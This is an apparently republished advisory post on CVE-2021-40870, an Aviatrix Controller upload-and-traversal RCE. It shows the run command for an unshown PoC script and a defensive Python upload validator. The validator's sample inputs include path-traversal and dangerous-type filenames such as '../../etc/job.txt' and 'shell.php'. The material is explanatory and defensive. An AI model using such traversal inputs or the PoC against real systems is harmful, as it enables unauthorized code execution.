
CVE-2021-40870 Aviatrix Controller RCE

Author: Khan安全团队
Published 2021-10-25 14:43:25
Column: Khan安全团队
Aviatrix Controller 6.x before 6.5-1804.1922 allows unrestricted upload of files with dangerous types, which lets an unauthenticated user execute arbitrary code via directory traversal.

To run this project, you need to add the following modules to your Python installation:

```shell
# Python modules required by the PoC script (requests, urllib3)
pip3 install requests urllib3
# Usage: point the script at the controller URL (site.com is a placeholder)
python3 poc.py https://site.com/
```
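The advisory above describes two defects combined: the upload endpoint accepted files of dangerous types, and the supplied filename was used in a way that allowed directory traversal out of the intended upload directory. The following is an added example written for this page (it is not code from the Khan安全团队 PoC, nor from Aviatrix); it shows what a hardened upload handler checks before writing a file. The allowlist of extensions, the upload root `/srv/uploads` and the sample filenames are constructed for the example, since the page does not give the real endpoint or paths.

```python
import os
import posixpath
from typing import Dict, Optional

# Constructed allowlist for this example: only these stored types are accepted.
ALLOWED_EXTENSIONS = {".txt", ".csv", ".pem", ".crt"}


def safe_upload_path(upload_root: str, client_filename: str) -> Optional[str]:
    """Return the absolute destination path for a client-supplied filename,
    or None if the upload must be rejected.

    Checks, in order:
      1. the name is non-empty and contains no NUL byte;
      2. the name is a bare filename: no "/" or "\\" and not "." or "..",
         so it cannot name a directory outside upload_root;
      3. the extension is on the allowlist, which rejects dangerous types
         (scripts, server-side executables) by construction;
      4. the resolved destination still lies inside upload_root, a second
         containment check that holds even if check 2 is later relaxed.
    """
    if not client_filename or "\x00" in client_filename:
        return None
    # Any path component at all is a traversal attempt; accept only a basename.
    if client_filename != posixpath.basename(client_filename) or "\\" in client_filename:
        return None
    if client_filename in (".", ".."):
        return None
    ext = posixpath.splitext(client_filename)[1].lower()
    if ext not in ALLOWED_EXTENSIONS:
        return None
    # Resolve symlinks on both sides so the containment check compares real paths.
    root = os.path.realpath(upload_root)
    dest = os.path.realpath(os.path.join(root, client_filename))
    if os.path.commonpath([root, dest]) != root:
        return None
    return dest


def is_accepted(upload_root: str, client_filename: str) -> bool:
    """True if the validator would allow the upload to be written."""
    return safe_upload_path(upload_root, client_filename) is not None


def check_samples(upload_root: str = "/srv/uploads") -> Dict[str, bool]:
    """Run the validator over constructed sample filenames (not real requests)
    and report which ones a hardened handler accepts."""
    samples = [
        "report.txt",              # ordinary allowed type
        "CERT.CRT",                # allowed type, case-insensitive extension
        "../../etc/job.txt",       # traversal via parent components
        "sub/dir/note.txt",        # path components are never accepted
        "shell.php",               # dangerous type, not on the allowlist
        "run.sh",                  # dangerous type, not on the allowlist
        "..",                      # bare parent reference
        "win\\style.txt",          # backslash separator
        "",                        # empty name
    ]
    return {name: is_accepted(upload_root, name) for name in samples}


if __name__ == "__main__":
    for name, ok in check_samples().items():
        print(f"{'ACCEPT' if ok else 'REJECT'}  {name!r}")
```

Note that the allowlist is deliberately closed: rather than enumerating "dangerous" extensions to block, the handler names the few types it needs and rejects everything else, so a type the blocklist author did not think of is still refused. The final `commonpath` check is defence in depth; it costs one `realpath` call and catches any future regression in the basename check.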


  • http://packetstormsecurity.com/files/164461/Aviatrix-Controller-6.x-Path-Traversal-Code-Execution.html
  • https://docs.aviatrix.com/HowTos/UCC_Release_Notes.html#security-note-9-11-2021
  • https://wearetradecraft.com/advisories/tc-2021-0002/

Shared from the Khan安全团队 WeChat public account. Originally published 2021-10-14.